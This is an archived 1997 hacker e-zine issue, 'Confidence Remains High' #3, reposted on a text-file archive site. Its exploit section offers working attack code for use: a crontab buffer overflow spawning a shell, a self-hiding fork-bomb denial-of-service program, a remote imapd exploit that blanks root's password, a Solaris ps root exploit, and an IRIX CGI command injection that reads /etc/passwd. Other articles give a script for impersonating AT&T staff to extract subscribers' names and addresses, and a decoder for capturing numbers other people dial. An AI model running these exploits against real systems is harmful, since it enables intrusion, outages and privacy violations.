About
Community
Bad Ideas
Drugs
Ego
Erotica
Fringe
Society
Technology
Hack
Hacker Zines
CERT
CHAL
CHAOS
CIAC
CPD
CPSR
CRH
CWD
CuD
CuD/A
EFF
LOL
MOD
Miscellaneous Phreak and Hacker Zines
NIA
RISKS
UXU
register | bbs | search | rss | faq | about
meet up | add to del.icio.us | digg it

Confidence Remains High #3 - CodeZero Magazine

NOTICE: TO ALL CONCERNED Certain text files and messages contained on this site deal with activities and devices which would be in violation of various Federal, State, and local laws if actually carried out or constructed. The webmasters of this site do not advocate the breaking of any law. Our text files and message bases are for informational purposes only. We recommend that you contact your local law enforcement officials before undertaking any project based upon any information obtained from this or any other web site. We do not guarantee that any of the information contained on this system is correct, workable, or factual. We are not responsible for, nor do we assume any liability for, damages resulting from the use of any information on this site.
???????????????????????????????????????????????????????????????????????????????
.oO The CodeZero Oo.
.oO Presents Oo.
???????????????????????????????????????????????????????????????????????????????

???????????????????????????????????????????????????????????????????
???? ????
???? -C-O-N-F-i-D-E-N-C-E- -R-E-M-A-i-N-S- ????
???? ????
???? ? ? ? ??? ? ? ????
???? ????????????? ???? ? ? ?? ???? ????????????? ????
???? ? ? ? ???? ? ? ????
???? ????
???? Issue 003, July 15th 1997. ????
???? ????
???????????????????????????????????????????????????????????????????

Are you on a w1nd0ze / D0s system?
We suggest you view this in EDIT.COM For added AsKii effects!@#

???????????????????????????????????????????????????????????????????????????????

_ /| k0dek4t sez...
\'o O'
=(_o_)= "EyEm HuNGaRy FoR CoDeZ,
U nOt CaTf00d!!#@"

----------------------------------
?--? HTTP://WWW.CODEZ.COM ?--?
----------------------------------

???????????????????????????????????????????????????????????????????????????????
In This "Added Vitamins And Minerals" Issue :
???????????????????????????????????????????????????????????????????????????????

-----=> Section A : Introduction And Cover Story.

1. Confidence Remains High Issue 3....................: Tetsu Khan
2. The Future.........................................: so1o

-----=> Section B : Exploits And Code.

1. crontab b00gz......................................: unknown
2. DoS : superforker.c................................: Vio
3. Cool Bot Juarez : personal.tcl.....................: Scorn
4. imapd Remote Exploit...............................: aky / p1
5. Solaris 2.5.1 ps Exploit...........................: J. Zbiciak
6. handler CGI Hole...................................: so1o

-----=> Section C : Phones / Scanning / Radio.

1. DTMF Decoder.......................................: xFli
2. Dealing With Directory Assistance Operators........: Qytpo
3. Russian fone #'s (+7 095 XXXxxxx)..................: CyberLirik

-----=> Section D : Miscellaneous.

1. More sIn inf0z.....................................: The CodeZero + Friends
2. The Codez That NASA Use............................: so1o
3. Rooting From Bin...................................: so1o
4. DNS Spoofing.......................................: so1o
5. FreeNet............................................: TrN
6. Backdoors Revised..................................: Blk-Majik
7. One Last Thing About The Infamous pHf Technique....: so1o

-----=> Section E : World News.

1. Some History.......................................: nobody
2. [GUNNAR] and MadSeason and sIn.....................: so1o
3. "Welcome to the [D]epartment of [O]wned [E]nergy"..: so1o

------=> Section F : Projects.

1. The CodeZero Remote Attack Kit Version 1.00 *FiNAL*: so1o

-----=> Section G : The End. (+ Personal Column)

???????????????????????????????????????????????????????????????????????????????
===============================================================================
==[ INTRO ]====================[ .SECTION A. ]======================[ INTRO ]==
===============================================================================
???????????????????????????????????????????????????????????????????????????????
1. Confidence Remains High Issue 3 : Tetsu Khan
???????????????????????????????????????????????????????????????????????????????

Because we just cannot keep the payments for www.codez.com up, and the server
keeps going up and down and up and down, Confidence Remains High and CodeZero
tools will soon be available at the following sites :

http://www.insecurity.org/codez/ [ main site, write it down :) ]
http://www.7thsphere.com/hpvac/hacking.html [ CRH distro site ]
http://www.r0ot.org [ CRH distro site ]

Also available thru FTP...

ftp.sekurity.org /users/so1o/ [ Codez distro site ]

But we are hoping to set up a new SUPER DOMAIN!@# Expect that within the next
issue or two, it will have...

CooL o-DaY WaReZ
eLeeT VMS hAx0RiN TeXt FiLeZ
K-r4d ANSi!@#

???????????????????????????????????????????????????????????????????????????????
2. The Future : so1o
???????????????????????????????????????????????????????????????????????????????

The Squirel is your friend, love the Squirel, trust the Squirel...

so1o

???????????????????????????????????????????????????????????????????????????????
===============================================================================
==[ EXPLOITS ]=================[ .SECTION B. ]===================[ EXPLOITS ]==
===============================================================================
???????????????????????????????????????????????????????????????????????????????
1. crontab b00gz : unknown
???????????????????????????????????????????????????????????????????????????????

/* crontab bug */

#include <stdio.h>
#include <stdlib.h>

long get_esp(void)
{
__asm__("movl %esp, %eax\n");
}

main(int argc, char **argv)
{
int i, j, offset;
char *bar, *foo;
unsigned long *esp_plus = NULL;

char mach_codes[] =
"\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
"\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
"\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
"\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";

if (argc == 2)
offset = atoi(argv[1]);

bar = malloc(4096);
if (!bar){
fprintf(stderr, "failed to malloc memory\n");
exit(1);
}

foo = bar; /* copy of original ptr */

esp_plus = (long *)bar;
for(i=0; i < 1024 ; i++)
*(esp_plus++) = (get_esp() + offset);

printf("Using offset (0x%x)\n", (get_esp() + offset));

bar = (char *)esp_plus;

for(j=0; j< strlen(mach_codes); j++)
*(bar++) = mach_codes[j];

*bar = 0;

execl("/usr/bin/crontab", "crontab", foo, NULL);
}

???????????????????????????????????????????????????????????????????????????????
2. DoS : superforker.c : Vio
???????????????????????????????????????????????????????????????????????????????

This program is fucking evil, I have tested it on a few systems and it just
screws them over and sloooOOooows them right down, you cant throw anything at
the shell, its pretty sadistic...

/* DOS-CoViN. Version .53b, coded by Vio, some ideas are from the
bugtraq

This program is a beefed up classic denial of service fork()'er :)

Compilation:

on BSD type of systems do: gcc -DBSD_C -o cvn cvn.c
on SysV type of systems do: gcc -DSYSV_C -o cvn cvn.c

on my linux, I can compile it with both -DBSD_C and -DSYSV_C

if your not sure, you can experiment, or compile it
without any -D'efines

In the future:

SunOS signals ignored.
Creation of random symlinks for more gory destruction.
Using advanced technology coding to make the hard drive
blow up with a loud boom and the console explode causing
a nuclear meltdown.

Direct All Suggestions And Flames to: Vio

NOTE: this program is provided for educational purposes only, its author
will not take any responsibility for any stupid things you will
decide to do.

this has been tested, but not the latest version of it.
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <signal.h>

#define MAX_FILELEN 100 /* The _actual_ max length */
#define MAX_DIRLEN 10

#define START_DIR "/tmp" /* This can be substituted for any directory */
/* that you have write access to */

void dirs_generator(void);

main(int argc, char *argv[])
{
int fp;
char *buff;
char chr;

unlink(argv[0]);

/* You might wanna ignore all the signals you can ignore.. */
signal(SIGINT, SIG_IGN); /* If any of the signals don't work */
signal(SIGHUP, SIG_IGN); /* on the system you are compiling */
signal(SIGTERM, SIG_IGN); /* them on, just erase that line */
signal(SIGALRM, SIG_IGN);
signal(SIGBUS, SIG_IGN);
signal(SIGFPE, SIG_IGN);
signal(SIGILL, SIG_IGN);
signal(SIGIOT, SIG_IGN);
signal(SIGPIPE, SIG_IGN);
signal(SIGQUIT, SIG_IGN);
signal(SIGSEGV, SIG_IGN);
signal(SIGTRAP, SIG_IGN);
signal(SIGUSR1, SIG_IGN);
signal(SIGUSR2, SIG_IGN);

#ifdef BSD_C
signal(SIGPROF, SIG_IGN);
signal(SIGSTOP, SIG_IGN);
signal(SIGTSTP, SIG_IGN);
signal(SIGTTIN, SIG_IGN);
signal(SIGTTOU, SIG_IGN);
signal(SIGVTALRM, SIG_IGN);
signal(SIGXCPU, SIG_IGN);
signal(SIGXFSZ, SIG_IGN);
#endif

#ifdef SYSV_C
signal(SIGPOLL, SIG_IGN);
signal(SIGPWR, SIG_IGN);
#endif

if(fork()) {
printf("Now crashing and blowing up this system.. have a nice day\n");
printf("You can safely logout, and let the proggie do its work\n");
printf("or you can stick around and watch lag go from 0 to bitch\n");
printf("in a matter of seconds\n");
printf(" --CoViN \n");
exit(0);
}
fp=open("/tmp/.foo",O_WRONLY|O_CREAT);
if(fork()) {
while(1) {
fork();
buff = malloc(64000);
write(fp, buff, 64000);
system("uptime");
}
}
dirs_generator();
}

void dirs_generator(void)
{
char alph[] = " abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ. ";
char fl[MAX_FILELEN];
char dir[MAX_DIRLEN];
int i;
int flen;

printf("Making dirs..\n");
chdir(START_DIR);

fork(); /* For the simplicity of the code.. we also want more dir's from */
fork(); /* the START_DIR */
fork();

while(1) {
fork();
flen= (rand() % MAX_FILELEN) - 1;
for(i=0; i<flen; i++)
fl[i] = alph[rand() % strlen(alph)];
fl[MAX_FILELEN-1]=0;
i=open(fl,O_WRONLY|O_CREAT);
write(i,"fuck you! CoViN",16);
close(i);

flen= (rand() % MAX_DIRLEN) - 1;
for(i=0; i<flen; i++)
dir[i] = alph[rand() % strlen(alph)];
dir[MAX_DIRLEN-1]=0;
mkdir(dir,0);
chdir(dir);
}
}

???????????????????????????????????????????????????????????????????????????????
3. Cool Bot Juarez : personal.tcl : Scorn
???????????????????????????????????????????????????????????????????????????????

# A simple example of using public responses to give the bot
# a personality. Send comments to SCORN ([email protected]).
# pHEARSOMe in #linuxwarez on EFnet runs this exact TCL script

# flag to turn personality on and off
set persona_flag 1

# min delay time between responses to prevent flooding
set persona_wait 10

# binds to answer questions

bind pubm - "*one*know*if*\\?*" pub_answer
bind pubm - "*one*know*how*\\?*" pub_answer
bind pubm - "*pHEARS*\\?*" pub_answer
bind pubm - "*pHEARS*bot*" pub_answer

# binds to answer greetings

bind pubm - "*re all*" pub_greet
bind pubm - "*hello all*" pub_greet
bind pubm - "*hi all*" pub_greet
bind pubm - "*sup*every*" pub_greet
bind pubm - "*sup*all*" pub_greet

# binds to answer goodbyes

bind pubm - "*cya*all" pub_bye
bind pubm - "*bbl*" pub_bye
bind pubm - "*bbia*" pub_bye
bind pubm - "*later*every*" pub_bye
bind pubm - "*bye*every*" pub_bye
bind pubm - "*ttyl*every*" pub_bye
bind pubm - "*later*all*" pub_bye
bind pubm - "*ttyl*all*" pub_bye
bind pubm - "*bye*all*" pub_bye

# binds to answer STUPID questions

bind pubm - "*one*got*site*" pub_stupid

# misc. binds

bind pubm - "*where*tk3play*" pub_tk3
bind pubm - "*url*tk3play*" pub_tk3
bind pubm - "*tk3play*where*" pub_tk3
bind pubm - "*tk3play*url*" pub_tk3
bind pubm - "*what*mp3*player*" pub_tk3
bind pubm - "*where*mp3*player*" pub_tk3

# arrays of responses

set stupid(0) "go ask for that in #linux, they might help you out there"
set stupid(1) "try ftp.linuxwarez.com!! it's got everything!!"
set stupid(2) "I got that, but I ain't givin it to you"
set stupid(3) "I tried to get that in #exceed today, but when i asked for it, it said 'cannot send o channel' but i don't want to send, i want to get!!! what am I doing wrong?"
set stupid(4) "no, but I got nekkid pics of sh00p if ya want."
set stupid(5) "no, but I got crabs, ya want some?"
set stupid(6) "I got that, I got that!!"
set stupid(7) "Talk to Trinitron, he's probably got that"
set stupid(8) "don't trade warez!!! its illegal!! you're gonna git busted!!"
set stupid(9) "I used to have that, but the fEDZ got muh warez CD and won't give it back :("
set stupid(10) "why don't yew stop leeching and start offering, ya lamah"
set stupid(11) "don't bother, it really sux. I rm -rf'd that REAL quick."
set stupid(12) "I got that, here, lemme send it over. But i'm on a 2600 baud modem."
set stupid(13) "when you get that, can you upload it to whitehouse.gov ftp site for me please?"
set stupid(14) "Linus Torvalds is giving that away, email him bout it"
set stupid(15) "I got that, but i'm only trading that for nude pics of sh00p."
set stupid(16) "I got that, but i'm only trading that for Linux for win95"
set stupid(17) "can you offer that up when ya git it? :)"
set stupid_size 18

set answer(0) "hellz yea"
set answer(1) "fuck no!"
set answer(2) "it's possible..."
set answer(3) "who cares? I shure as hell don't"
set answer(4) "I dunno, go ask in #lamer"
set answer(5) "I could tell ya, but then i'd have to kill ya."
set answer(6) "maybe"
set answer(7) "hmmm...."
set answer(8) "uh....."
set answer(9) "err...."
set answer(10) "lemme think about that one for a sec"
set answer(11) "I ain't no Answer Wizard"
set answer(12) "RTFM"
set answer(13) "nope"
set answer(14) "um, no"
set answer(15) "ya, i think so"
set answer(16) "no way"
set answer_size 17

set greets(0) "sup"
set greets(1) "yo!"
set greets(2) "oh no not you again"
set greets(3) "hey whut's up"
set greets(4) "you came in the wrong room this ain't #dogsex,"
set greets(5) "go away"
set greets(6) "well look who's here, its"
set greets(7) "hey, i hear #netsex misses you,"
set greets(8) "we missed you"
set greets(9) "oh no, yew gotta be another #oldwarez lamer, aren't you,"
set greet_size 10

set bye(0) "lata"
set bye(1) "and don't come back"
set bye(2) "cyaz"
set bye(3) "goin to #sexpics again I see...yer a perv"
set bye(4) "bye"
set bye(5) "take it easy"
set bye(6) "see ya in hell"
set bye_size 7

# general functions to answer questions randomly, has a
# delay so other more specific binds will have priority

proc pub_answer {nick uhost hand channel args} {
global persona_flag answer_nick answer_channel
if {$persona_flag} {
set answer_nick $nick
set answer_channel $channel
utimer 1 _pub_answer
}
return 0
}

proc _pub_answer {} {
global answer answer_size persona_flag answer_nick answer_channel
if {$persona_flag} {
persona_pause
putserv "PRIVMSG $answer_channel :$answer([rand $answer_size])"
putlog "<<$answer_nick>> Persona-Answer"
return 1
}
return 0
}

# function to answer greetings

proc pub_greet {nick uhost hand channel args} {
global greets greet_size persona_flag
if {$persona_flag} {
persona_pause
putserv "PRIVMSG $channel :$greets([rand $greet_size]) $nick"
putlog "<<$nick>> Persona-Greet"
return 1
}
return 0
}

# function to answer stupid stuff

proc pub_stupid {nick uhost hand channel args} {
global stupid stupid_size persona_flag
if {$persona_flag} {
persona_pause
putserv "PRIVMSG $channel :$nick , $stupid([rand $stupid_size])"
putlog "<<$nick>> Persona-Stupid"
return 1
}
return 0
}

# function to answer goodbyes

proc pub_bye {nick uhost hand channel args} {
global bye bye_size persona_flag
if {$persona_flag} {
persona_pause
putserv "PRIVMSG $channel :$bye([rand $bye_size]) $nick"
putlog "<<$nick>> Persona-Bye"
return 1
}
return 0
}

# misc. functions

proc pub_tk3 {nick uhost hand channel args} {
global persona_flag
if {$persona_flag} {
persona_pause
putserv "PRIVMSG $channel :$nick, check out tk3play at bleh"
putlog "<<$nick>> Persona-tk3play"
return 1
}
return 0
}

# function to enforce minimum pause between responses

proc persona_pause {} {
global persona_flag persona_wait
if {$persona_flag} {
persona_off
utimer $persona_wait persona_on
}
return 1
}

# functions to turn the personality on and off

proc persona_on {} {
global persona_flag
set persona_flag 1
return 1
}

proc persona_off {} {
global persona_flag
set persona_flag 0
return 1
}

putlog "Scorn's persona.tcl is loaded"

???????????????????????????????????????????????????????????????????????????????
4. imapd Remote Exploit : aky / p1
???????????????????????????????????????????????????????????????????????????????

This is the slightly upgraded version of this exploit floating around, there
is also another, which is very hard to get, which spawns a shell with root
access, I have also heard of European hacker groups coding homemade versions
and variants which will this, so for the moment, heres this exploit,
imapd usually runs on port 143. This version changes the root passwd field
to being blank, so you can su to root without a password. I have heard there
are problems and limitations with this, but that ain't my problem..

/*

This is the remote exploit of the hole in the imap daemon, for
Linux. The instruction code is doing open(), write(), and close()
system calls, and it adds a line root::0:0.. at the beggining of
/etc/passwd (change to /etc/shadow if needed). The code needs to
be self modifying since imapd turns everything to lowercase before
it pushes it on the stack. The problem is that it rewrites the
first line of passwd/shadow, therefore loosing the root password.
I'm sorry, but I don't have time to add in the seek syscall.

- Akylonius ([email protected]) [1997]

Modifications made on 5.1.97 to accept command line hostname, with
'h_to_ip' function that resolves it to an ip. - p1 ([email protected])

*/

#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <arpa/inet.h>
#include <netdb.h>

char *h_to_ip(char *hostname);

char *h_to_ip(char *hostname) {

struct hostent *h;
struct sockaddr_in tmp;
struct in_addr in;

h = gethostbyname(hostname);

if (h==NULL) { perror("Resolving the host. \n"); exit(-1); }

memcpy((caddr_t)&tmp.sin_addr.s_addr, h->h_addr, h->h_length);
memcpy(&in,&tmp.sin_addr.s_addr,4);

return(inet_ntoa(in));
}

void banner(void) {
system("clear");
printf("\nIMAP Exploit for Linux.\n");
printf("\n\tAuthor: Akylonius ([email protected])\n");
printf(" Modifications: p1 ([email protected])\n");
}

main(int argc, char **argv) {

int fd;
struct sockaddr_in sckdaddr;
char *hostname;
char buf[4092];
int i=8;
char realegg[] =
"\xeb\x58\x5e"
"\x31\xdb\x83\xc3\x08\x83\xc3\x02\x88\x5e\x26"
"\x31\xdb\x83\xc3\x23\x83\xc3\x23\x88\x5e\xa8"
"\x31\xdb\x83\xc3\x26\x83\xc3\x30\x88\x5e\xc2"
"\x31\xc0\x88\x46\x0b\x89\xf3\x83\xc0\x05\x31"
"\xc9\x83\xc1\x01\x31\xd2\xcd\x80\x89\xc3\x31"
"\xc0\x83\xc0\x04\x31\xd2\x88\x56\x27\x89\xf1"
"\x83\xc1\x0c\x83\xc2\x1b\xcd\x80\x31\xc0\x83"
"\xc0\x06\xcd\x80\x31\xc0\x83\xc0\x01\xcd\x80"
"\xe8\x83\xff\xff\xff"
"/etc/passwdxroot::0:0:r00t:/:/bin/bashx";
char *point = realegg;
buf[0]='*';
buf[1]=' ';
buf[2]='l';
buf[3]='o';
buf[4]='g';
buf[5]='i';
buf[6]='n';
buf[7]=' ';

banner();

if (argc<2) {
printf("\nUsage: %s <hostname>\n\n", argv[0]);
exit(-1);
}

hostname=argv[1];

while(i<1034-sizeof(realegg) -1) /* -sizeof(realegg)+1) */
buf[i++]=0x90;

while(*point)
buf[i++]=*(point++);

buf[i++]=0x83; /* ebp */
buf[i++]=0xf3;
buf[i++]=0xff;
buf[i++]=0xbf;
buf[i++]=0x88; /* ret adr */
buf[i++]=0xf8;
buf[i++]=0xff;
buf[i++]=0xbf;

buf[i++]=' ';
buf[i++]='b';
buf[i++]='a';
buf[i++]='h';
buf[i++]='\n';

buf[i++]=0x0;

if ((fd=socket(AF_INET,SOCK_STREAM,0))<0) perror("Error opening the socket. \n");

sckdaddr.sin_port=htons(143);
sckdaddr.sin_family=AF_INET;
sckdaddr.sin_addr.s_addr=inet_addr(h_to_ip(hostname));

if (connect(fd,(struct sockaddr *) &sckdaddr, sizeof(sckdaddr)) < 0) perror("Error with connecting \n");

printf("hmm: \n");
getchar();
write(fd,buf,strlen(buf)+1);
printf("hmm: \n");
close(fd);
}

???????????????????????????????????????????????????????????????????????????????
5. Solaris 2.5.1 ps Exploit : J. Zbiciak
???????????????????????????????????????????????????????????????????????????????

#!/bin/sh
#
# Exploit for Solaris 2.5.1 /usr/bin/ps
# J. Zbiciak, 5/18/97
#
# Just copy this into one file, upload it to a system, chmod 755 <file> and
# then run it using <file>

# change as appropriate
CC=gcc

# Build the "replacement message" :-)
cat > ps_expl.po << E_O_F
domain "SUNW_OST_OSCMD"
msgid "usage: %s\n%s\n%s\n%s\n%s\n%s\n%s\n"
msgstr "\055\013\330\232\254\025\241\156\057\013\332\334\256\025\343\150\220\013\200\016\222\003\240014\224\032\200\012\234\003\240\024\354\073\277\354\300\043\277\364\334\043\277\370\300\043\277\374\02\020\040\073\221\320\040\010\220\033\300\017\202\020\040\001\221\320\040\010"
E_O_F

msgfmt -o /tmp/foo ps_expl.po

# Build the C portion of the exploit
cat > ps_expl.c << E_O_F

/*****************************************/
/* Exploit for Solaris 2.5.1 /usr/bin/ps */
/* J. Zbiciak, 5/18/97 */
/*****************************************/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

#define BUF_LENGTH (632)
#define EXTRA (256)

int main(int argc, char *argv[])
{
char buf[BUF_LENGTH + EXTRA];
/* ps will grok this file for the exploit code */
char *envp[]={"NLSPATH=/tmp/foo",0};
u_long *long_p;
u_char *char_p;
/* This will vary depending on your libc */
u_long proc_link=0xef70ef70;
int i;

long_p = (u_long *) buf;

/* This first loop smashes the target buffer for optargs */
for (i = 0; i < (96) / sizeof(u_long); i++)
*long_p++ = 0x10101010;

/* At offset 96 is the environ ptr -- be careful not to mess it up */
*long_p++=0xeffffcb0;
*long_p++=0xffffffff;

/* After that is the _ctype table. Filling with 0x10101010 marks the
entire character set as being "uppercase printable". */
for (i = 0; i < (BUF_LENGTH-104) / sizeof(u_long); i++)
*long_p++ = 0x10101010;

/* build up _iob[0] (Ref: /usr/include/stdio.h, struct FILE) */
*long_p++ = 0xFFFFFFFF; /* num chars in buffer */
*long_p++ = proc_link; /* pointer to chars in buffer */
*long_p++ = proc_link; /* pointer to buffer */
*long_p++ = 0x0501FFFF; /* unbuffered output on stream 1 */
/* Note: "stdin" is marked as an output stream. Don't sweat it. :-) */

/* build up _iob[1] */
*long_p++ = 0xFFFFFFFF; /* num chars in buffer */
*long_p++ = proc_link; /* pointer to chars in buffer */
*long_p++ = proc_link; /* pointer to buffer */
*long_p++ = 0x4201FFFF; /* line-buffered output on stream 1 */

/* build up _iob[2] */
*long_p++ = 0xFFFFFFFF; /* num chars in buffer */
*long_p++ = proc_link; /* pointer to chars in buffer */
*long_p++ = proc_link; /* pointer to buffer */
*long_p++ = 0x4202FFFF; /* line-buffered output on stream 2 */

*long_p =0;

/* The following includes the invalid argument '-z' to force the
usage msg to appear after the arguments have been parsed. */
execle("/usr/bin/ps", "ps", "-z", "-u", buf, (char *) 0, envp);
perror("execle failed");

return 0;
}
E_O_F

# Compile it
$CC -o ps_expl ps_expl.c

# And off we go!
exec ./ps_expl

???????????????????????????????????????????????????????????????????????????????
6. handler CGI Hole : so1o
???????????????????????????????????????????????????????????????????????????????

New bug that affects most IRIX systems, heres how you use it...

telnet target.machine.com 80
GET /cgi-bin/handler/useless_shit;cat /etc/passwd|?data=Download
HTTP/1.0

???????????????????????????????????????????????????????????????????????????????
===============================================================================
==[ FONES / SCANNING ]=========[ .SECTION C. ]===========[ FONES / SCANNING ]==
===============================================================================
???????????????????????????????????????????????????????????????????????????????
1. DTMF Decoder : xFli
???????????????????????????????????????????????????????????????????????????????

DTMF Decoder plans.
-------------------

If you are into bigtime surveillance, or you just have some burning desire
to get the phone number of your sisters sexy friend, then you will be
interested in this little circuit. Basically, using this, you can use a tape
recorder and a pickup coil to record the DTMF tones sent when someone dials
a number, or if it is easier to you can wire it up to a phone jack and
decode in realtime, and then decode them to get the number dialled. This
can cope with speed dialling, but you will need a reasonably good recording
to decode successfully.

The circuit is simplicity itself, literally only 5 components. I could have
included an unreadable ascii circuit diag / pcb layout, but it would have been
a waste of time, so the diags are available from http://www.codez.com and other
CodeZero sites.

The hardware takes the DTMF signal, decodes it and sends it to lpt1, where the
binary output of the ic is converted into standard numbers. The simple BASIC
program is included. Which is precompiled on http://www.codez.com

Component list:
----------------

1 x SSI202 18 pin Chip
1 x 3.579 MHz quartz crystal
2 x 27n Capacitors
1 x 1M resistor

Source:
--------

DTMF DECODER SOFTWARE
------------------------------------------

' Use this to decode the output from the decoder hardware
' Not written by xFli, suggested in an electronics mag.

10 CLS:KEY OFF
20 I=INP(&H279)
30 IF (I AND 128)=128 THEN 30
40 C=0
50 IF (I AND 8)=8 THEN C=C+1
60 IF (I AND 16)=16 THEN C=C+2
70 IF (I AND 32)=32 THEN C=C+4
80 IF (I AND 64)=64 THEN C=C+8
90 IF C=11 THEN PRINT" * ";:GOTO 180
100 IF C=12 THEN PRINT" # ";:GOTO 180
110 IF C=13 THEN PRINT" A ";:GOTO 180
120 IF C=14 THEN PRINT" B ";:GOTO 180
130 IF C=15 THEN PRINT" C ";:GOTO 180
140 IF C=0 THEN PRINT" D ";:GOTO 180
150 IF C=10 THEN PRINT" 0 ";:GOTO 180
160 PRINT C;
170 I=INP(&H279)
180 IF (I AND 128)=0 THEN 180
190 T=TIMER
200 I=INP(&H279)
210 IF (TIMER-T)>5 THEN PRINT:PRINT:GOTO 30
220 IF (I AND 128) = 128 THEN 210
230 GOTO 50

In the magazine, it is advised you use gw-basic, which is included with very
very early DOS versions. It may or may not work with qbasic etc. I don't know.
These are also for UK tones, maybe they are different in the US.

???????????????????????????????????????????????????????????????????????????????
2. Dealing with directory assistance operators : Qytpo
???????????????????????????????????????????????????????????????????????????????

Allright, this information should be made available to everyone who cares
to read it. Any information used from this article is to be used at a
persons own risk. i will not be held responsible if any of this is used
for wrongfull purposes- ( it can, you just have to get really creative ).

Well, to start off, the job of the directory assistance operator, is to
give out addresses, phone numbers, and area codes, for the information
given to them. The operators can search from names, business names, and
government names, despite what anyone tells you, an AT&T DIRECTORY
ASSISTANCE OPERATOR CAN DO A CNA SEARCH. (Customer name and address)
If the particular operator says they cant, then bug them. yell at them.
if they dont do it themselves, they will get their supervisor. and if you
make it sound really important they can do it. and if all that doesnt
work, try to find a naive operator, tell them you are an AT&T
administrator, and say, to press (Control+C) to bring up a CNA search on
their switch. A CNA search is a very valuable asset, if you cannot find a
CNA operator, give a directory assistance operator a whirl, chances are,
if you have a brain, and are a decent actor, you can get the listing for
the number you give them.

Routing.

The calls are routed through a large mainframe in each state department
How it works: Say you dial, 602-555-1212. that would put you through to an
operator ANYWHERE in the United States, where phoenix calls are routed
through to. it will not just appear in 602, allthought that is where it is
supposed to. If the switches in 602 are full, the call could end up
anywhere in the US.

When the operator picks up the reciever- (it is actually a headset that
beeps). The call is automatically traced to whatever area code they
dialed. so if You dialed (602 555 1212). an operator anywhere in the US,
would get a listing on their screen, and a default city, in the upper left
hand corner [PHOE] (phoenix arizona). [ *note*: depending on the area
code, 602 for example, the operator can search the area codes permitted in
that area code..]

for example, if you dialed 602-555-1212, the operator would be allowed to
search in 502 (the other area code in AZ) However, in some area codes,
they will make you redial, like LA, or TEXAS, or NEWYORK;
they have so many area codes, For example 310 and 210, in LOS ANGELES
If you wanted a listing for LOS ANGELES, and dialed 210-555-1212,
and wanted a listing for city in los angeles which was 310, they would
make you hang up and dial 310-555-1212. (the operator
shuld be saying to himself/herself, "no, this kiddie needz to call 310
instead, or i get fired for giving out bad information"...if they have a
clue)

Sample Call to a D A O for a CNA Search: ( The best way to get info )

( caller dials 555-1212 in area code )

<Operator > City please?
<Caller > Yes, this is James Thornton at AT&T the AT&T administrative
assistance office. I need you to do a CNA Search for me.
<Operator > I'm sorry sir, we're not permitted to do CNA searches.
<Caller > Yes, I know. May I speak to a supervisor?
<Supervisor> This is So and So supervisor, how can I help you sir?
<Caller > Yes, this is James Thornton down at the AT&T (also called Excel)
office in Florida, we need a CNA search done for a XXX-XXX-XXXX.
<Supervisor> One moment please.
<Caller > Ok.
<Supervisor> Ok, I am (or am not) showing a listing for XXX-XXX-XXXX,
would you like that listing sir?
<Caller > Yes please, and I would like that verbally. (if you time it just
right, you can get the info for free. if yer beige boxing, it
doesnt really make a difference tho.) - hang up, say "what" a few
times, to make it sound like you didnt get the listing. and hang up
before she finishes the second time. she can only bill you while
you are on the line, and if she fucks up, you can get away with it
with no bill while they read you the number. This method only
works for a verbal listing. if yer quick enough. ;)

- - - The NPA RULES. - - -

NPA dialed : NPAS PERMITTED TO SEARCH IN FROM THE NPA DIALLED

-----California----
213 213
209 408 510 707 916
408 209 510
415 510 707
510 209 408 415 707 916
707 209 415 510 916
714 714
916 209 510 707

-------Texas-------
210 512 915
214 817 903 972
281 409 713
409 281 512 713 817 903
512 210 409 817 915
713 281 409
806 817 915
817 214 409 512 806 903
903 214 409 817
915 210 512 806 817
972 214 817 903

-----New York------
212 718 914 917
315 518 607 716
516 718
518 315 607 914
607 315 518 716 914
716 315 607
718 212 518 914
914 212 518 607 718
917 (cell) 212 718 914

*note*: all other states can search all NPA's listed in that state.

- Qytpo (@#hackers on EFnet)

???????????????????????????????????????????????????????????????????????????????
3. Russian fone #'s (+7 095 XXXxxxx) : CyberLirik
???????????????????????????????????????????????????????????????????????????????

Some Interesting ph0ne #'s [07.06.97]
Have some real phun with these, they are up-to-date!@#

[RUSSiA] +7 095 XXXxxxx

-----------------------------------------------------------------------

AT&T Calling Cards Service

-----------------------------------------------------------------------

9740074 Tone System - AT&T Moscow HQ
switch to tone mode
press 0 to page operator
then by pressing "1" ya can record your voice message
then by pressing "2" & "3" ya can hear your record :)

7555042 English-speeking AT&T operator
1555042 Also Automate AT&T Calling System is here ( tone mode )

7555555 Russian-speeking AT&T operator
1555555 No AT&T Tone Machine !

-----------------------------------------------------------------------

Sprintnet Local Dial-Ups 02501 & 03110 DNICs
GlobalOne = Sprintnet = Telenet

-----------------------------------------------------------------------

9286344 9600
9280985 9600
9137166 9600 < Only for MAIL
5789119 2400
3428376 9600 real connect 2400
9167373 SprintNet V34-19200
9167272 ???
9167171 ?

00wait8 RoSprint PPP dialup.

-----------------------------------------------------------------------
ROSPAC Local Dial-Ups 02500 DNIC
-----------------------------------------------------------------------

9270003 9600
9563692 9600
9563690

-----------------------------------------------------------------------
Rosnet Dialups 02506 DNIC
-----------------------------------------------------------------------

975-8403
913-3571
921-2103
201-2030 Voice:(095)206-8570,206-8458,206-7238
442-6422
442-8277
442-7022
442-8388
442-7088
442-8577
442-8077
442-6477

Iskra-2:
20-906,33-571

-----------------------------------------------------------------------
IBM net Dial-Up
-----------------------------------------------------------------------

2586420

-----------------------------------------------------------------------
Russia@Online Dial-Ups 28.8Kbps
-----------------------------------------------------------------------

9132376 30 lines
2584120 60 lines
3619999
2584161 Voice phone !

-----------------------------------------------------------------------
InfoNet Euro
-----------------------------------------------------------------------

9150001 28.8
9150005 28.8
2400 temp [unpublished]
2400 temp [unpublished]
2400 temp [unpublished]
2400 temp [unpublished]

2927056 Infonet Euro Voice !

-----------------------------------------------------------------------
Sita Network (AOLGLOBALnet & SCITOR {aka EQUANT} )
-----------------------------------------------------------------------

9563589 14400
[unpublished]
